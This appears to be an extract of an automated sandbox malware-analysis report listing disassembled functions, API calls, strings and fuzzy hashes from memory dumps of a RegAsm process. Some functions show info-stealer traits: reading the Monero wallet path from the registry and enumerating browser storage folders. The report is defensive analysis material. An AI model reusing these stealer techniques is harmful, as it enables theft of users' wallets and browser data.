Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$H_prologlstrcpylstrlen
String ID:
API String ID: 539094379-0
Opcode ID: 140db06df07f0f02ad11c399cd345c347d06653d79c61c60457ba0ecb9a40ac8
Instruction ID: 5739046bb0ea242b01923bd187ac70bde4d68b67f3f8ad2bdeb4f795aa5fa184
Opcode Fuzzy Hash: 140db06df07f0f02ad11c399cd345c347d06653d79c61c60457ba0ecb9a40ac8
Instruction Fuzzy Hash: 8521A4716005059BCB14DF54CE81BEBB3ACAB14314F10412FE026E75D1DBB8E9958A69

Function 1B5CF4CA Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 1B5CF4E0
GetLastError.KERNEL32(?,?,?,?), ref: 1B5CF4ED
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 1B5CF513
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 1B5CF539

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 2d8c36d3aea0754ad1a2cb17d4e70af139a75516288e4f88b171ed2e96876ee0
Instruction ID: abfa2942f959bffc0d2fd35c6ecf8c27b4ffc8bc017723cce556a2463a2506f2
Opcode Fuzzy Hash: 2d8c36d3aea0754ad1a2cb17d4e70af139a75516288e4f88b171ed2e96876ee0
Instruction Fuzzy Hash: 0A114871900229BBEF00AF94CC889DF3FBEEB40760F504149F924921A0D731DA58DBA0

Function 0041A3A9 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0041A3CF

Part of subcall function 0041A1FB: __fltout2.LIBCMT ref: 0041A226

__cftog_l.LIBCMT ref: 0041A3F5
__cftoe_l.LIBCMT ref: 0041A427

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 25af29a0fda288dbd85b725237ec75aa62e2d2e3f376b4cd3774b2483591e18b
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 77114E3204114EBBCF125E95DC058EE3F62BB1C354B58841AFE2859131D77AC9B1AB8A

Function 00410745 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041074A
lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
lstrcpy.KERNEL32(00000000), ref: 00410799
lstrcat.KERNEL32(?,?), ref: 004107A4

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcatlstrcpylstrlen
String ID:
API String ID: 809291720-0
Opcode ID: a87b8ca6b4341b336eea30c24d0bc2ba31b0458c35ec2224e89d981afd5a96d3
Instruction ID: 4b83153e1ed031626d79cde972cfe9ff8005c28ce39782d0209c47536c7bbac0
Opcode Fuzzy Hash: a87b8ca6b4341b336eea30c24d0bc2ba31b0458c35ec2224e89d981afd5a96d3
Instruction Fuzzy Hash: 7D014876900245EFCB209F9AD88459AFBB9FF49314B14883EE5A9D3610C7B4A9808B50

Function 00401000 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
RegOpenKeyExA.ADVAPI32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 6290f58ea6082a8f0d7eacdddb272b7dd22ab584f6f71bd5d95766467ac880e0
Instruction ID: 212ff1027d6e1122995d41de8c942062a2340c6a476f8bcb0ecb579ecd8afaaf
Opcode Fuzzy Hash: 6290f58ea6082a8f0d7eacdddb272b7dd22ab584f6f71bd5d95766467ac880e0
Instruction Fuzzy Hash: AAF03079640248FFEB115F90DD0AFAE7F7AEB46B01F105024F701E91A0D7B19A909B10

Function 004108E1 Relevance: 6.0, APIs: 4, Instructions: 33memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004275FA), ref: 004108EF
HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004275FA), ref: 004108F6
GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004275FA), ref: 00410902
wsprintfA.USER32 ref: 0041092D

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: 84332fec0cfa48b9c5eaee6cbbd19720363ad61aef86ef8f495ddf21fb37d41a
Instruction ID: a76d7531b77783713ca4f59810f409c7e0a6937fa4c8a0eee5bd17945cdbf8a8
Opcode Fuzzy Hash: 84332fec0cfa48b9c5eaee6cbbd19720363ad61aef86ef8f495ddf21fb37d41a
Instruction Fuzzy Hash: 0EF0FEAA901128BADB50ABD99D09ABE76FDEB0DA02F001041FB45E5090E6388A90D7B0

Function 1B3D2ABD Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 1B5D1382
GetLastError.KERNEL32 ref: 1B5D138E
___initconout.LIBCMT ref: 1B5D139E

Part of subcall function 1B5D1303: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1B5D13A3), ref: 1B5D1316

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 1B5D13B3

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: ea48d238970f5dca0ca430444daa5c31bd20ced636c77320901ddebaa99b32ac
Instruction ID: ce956c05cb59900dafd00b3ce130e8e9343b61d839cba9fa01cf2ed4fa99b5b5
Opcode Fuzzy Hash: ea48d238970f5dca0ca430444daa5c31bd20ced636c77320901ddebaa99b32ac
Instruction Fuzzy Hash: 17F0A036404235BFCF161FAACD449CE3FAAFB882A1F444125FA2885120CA32C8649BC0

Function 1B3EBE80 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1B3EC1B5

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 4eb99c92f5827e1cb0e6e53e04c9e737ad25a2ce012652edc4294dce8ed56b93
Instruction ID: bb68ee65bfbe53dce8f25ee282408f1fb14baad8808b1434efb339cc12577547
Opcode Fuzzy Hash: 4eb99c92f5827e1cb0e6e53e04c9e737ad25a2ce012652edc4294dce8ed56b93
Instruction Fuzzy Hash: 7CA13B759087A64FDB058E288C917DAB7D1AF85220F940B1FF4E1873D1E770E8A58BB1

Function 1B557300 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

%!.15g, xrefs: 1B5575C3
-, xrefs: 1B557538

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %!.15g$-
API String ID: 0-583212262
Opcode ID: 5f4cf4aac332ad42b43a10560125986218f0b4de80a2fa80773c5cfe8ecc8c02
Instruction ID: 6a5e8a0be710f8fa6dde55b820d94ca3bcad11c8dfc02280c30875b5cfa0be17
Opcode Fuzzy Hash: 5f4cf4aac332ad42b43a10560125986218f0b4de80a2fa80773c5cfe8ecc8c02
Instruction Fuzzy Hash: 6E919B71A083428FD704DF6DD89179AFBE0EBC8310F44492EE899C7351E7B9D8098B92

Function 1B41CBF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1B41CE39

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: b2c6315c895aca64a4ec29c4186bcbee8fd36d21a73bcf0acfd8b2b57bf34c90
Instruction ID: 761a88ec49a56be4c09566cf04d354d086c309b74cdbc28734e04ff9bba2d9e4
Opcode Fuzzy Hash: b2c6315c895aca64a4ec29c4186bcbee8fd36d21a73bcf0acfd8b2b57bf34c90
Instruction Fuzzy Hash: 8881EDB5E043059BD700CF18CC82BDAB7E5AF84710F048968F9859F392E375F9958B9A

Function 1B4F78F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

*, xrefs: 1B4F7982
?, xrefs: 1B4F794A

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: *$?
API String ID: 0-2367018687
Opcode ID: 5a01501e82bdd0e3e525662f334583e40423f0946a838dbcf2aeb123199e69de
Instruction ID: 125235ff1df131fb362b5f1dad77363a184f1821bfd97a4b757e22e09a439f68
Opcode Fuzzy Hash: 5a01501e82bdd0e3e525662f334583e40423f0946a838dbcf2aeb123199e69de
Instruction Fuzzy Hash: 8971B2B0A083528FD715CF2DC88079BBBE6EF85200F45896DE9C5C7305D779DA468B92

Function 1B3EC8E0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON

Download Yara Rule

Strings

ESCAPE expression must be a single character, xrefs: 1B3ECA43
LIKE or GLOB pattern too complex, xrefs: 1B3EC94F

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 0-264706735
Opcode ID: 7d50f8f3c6d33e9b608798ebfc8fa8dd029070f23056f6ca751413fe6c2a933c
Instruction ID: 81b9e651fdf72b8edc090c0ac4d90099aaa35a3b75b307f86b9e0d04a20f5509
Opcode Fuzzy Hash: 7d50f8f3c6d33e9b608798ebfc8fa8dd029070f23056f6ca751413fe6c2a933c
Instruction Fuzzy Hash: 8F618975A042B14FDB08CB24C882BED77A5AF41324FA4438FF8929B2D2D275D4A5C370

Function 0040BAF1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040BAF6

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00411986: _EH_prolog.MSVCRT ref: 0041198B
Part of subcall function 00411986: GetFileAttributesA.KERNEL32(00000000,?,0040C604,?,00426CD2,?,?), ref: 0041199F

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040B4C3: _EH_prolog.MSVCRT ref: 0040B4C8
Part of subcall function 0040B4C3: wsprintfA.USER32 ref: 0040B4F1
Part of subcall function 0040B4C3: FindFirstFileA.KERNEL32(?,?), ref: 0040B508
Part of subcall function 0040B4C3: StrCmpCA.SHLWAPI(?,00426F6C), ref: 0040B525
Part of subcall function 0040B4C3: StrCmpCA.SHLWAPI(?,00426F70), ref: 0040B53F
Part of subcall function 0040B4C3: lstrlenA.KERNEL32(00000000,00426CAE,00000000,?,?,?,00426F74,?,?,00426CAB), ref: 0040B5EF

Strings

\storage\default\, xrefs: 0040BB37
.metadata-v2, xrefs: 0040BBB3

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$Filelstrcatlstrlen$AttributesFindFirstwsprintf
String ID: .metadata-v2$\storage\default\
API String ID: 2418158533-762053450
Opcode ID: fa4b97f7d441720c92c01404bdb8f65667c88bcd8ceabd3f77cda2468181864a
Instruction ID: 232c74877c60758bd9c2e18564c87d6e5377a04b8545425fd62c6590ad44cec1
Opcode Fuzzy Hash: fa4b97f7d441720c92c01404bdb8f65667c88bcd8ceabd3f77cda2468181864a
Instruction Fuzzy Hash: 8F619470801288EACF04EBE5D656BDDBBB46F14308F50405EF84563282DBBC1B98DBA7

Function 1B3ED0F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1B3ED213

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
